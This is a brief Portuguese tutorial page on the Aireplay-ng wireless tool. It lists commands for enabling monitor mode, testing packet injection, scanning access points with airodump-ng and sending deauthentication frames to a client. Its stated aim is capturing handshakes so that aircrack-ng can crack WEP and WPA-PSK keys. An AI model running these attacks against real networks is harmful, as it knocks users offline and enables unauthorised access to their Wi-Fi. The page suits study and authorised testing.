Aireplay-ng
A função primária do Aireplay-ng é gerar tráfego para uso posterior no aircrack-ng para quebrar as chaves WEP e WPA-PSK. Existem diferentes ataques que podem causar desautenticação com o propósito de capturar dados de handshake WPA, autenticações falsas, repetição interativa de pacotes, injeção de solicitação ARP feita à mão e reinjeção de solicitação ARP. Com a ferramenta packetforge-ng é possível criar frames arbitrários
Para listar todos os recursos,
aireplay-ngusamos o seguinte comando.
aireplay-ngHabilitar o modo monitor
sudo airmon-ng start wlan0 1Como alternativa, podemos usar o
iwcomando para definir o canal da seguinte forma
sudo iw dev wlan0mon set channel 1Testando para injeção de pacotes
sudo aireplay-ng --test wlan0monUsando Aireplay-ng para realizar a desautenticação
Primeiro, vamos usar o airodump-ng para visualizar as redes WiFi disponíveis, também conhecidas como pontos de acesso (APs).
sudo airodump-ng wlan0monVamos enviar uma solicitação de desautenticação para um dos clientes com o ID da estação
00:0F:B5:32:31:31.
sudo aireplay-ng -0 5 -a <MAC Address AP> -c <MAC Address client> wlan0monLast updated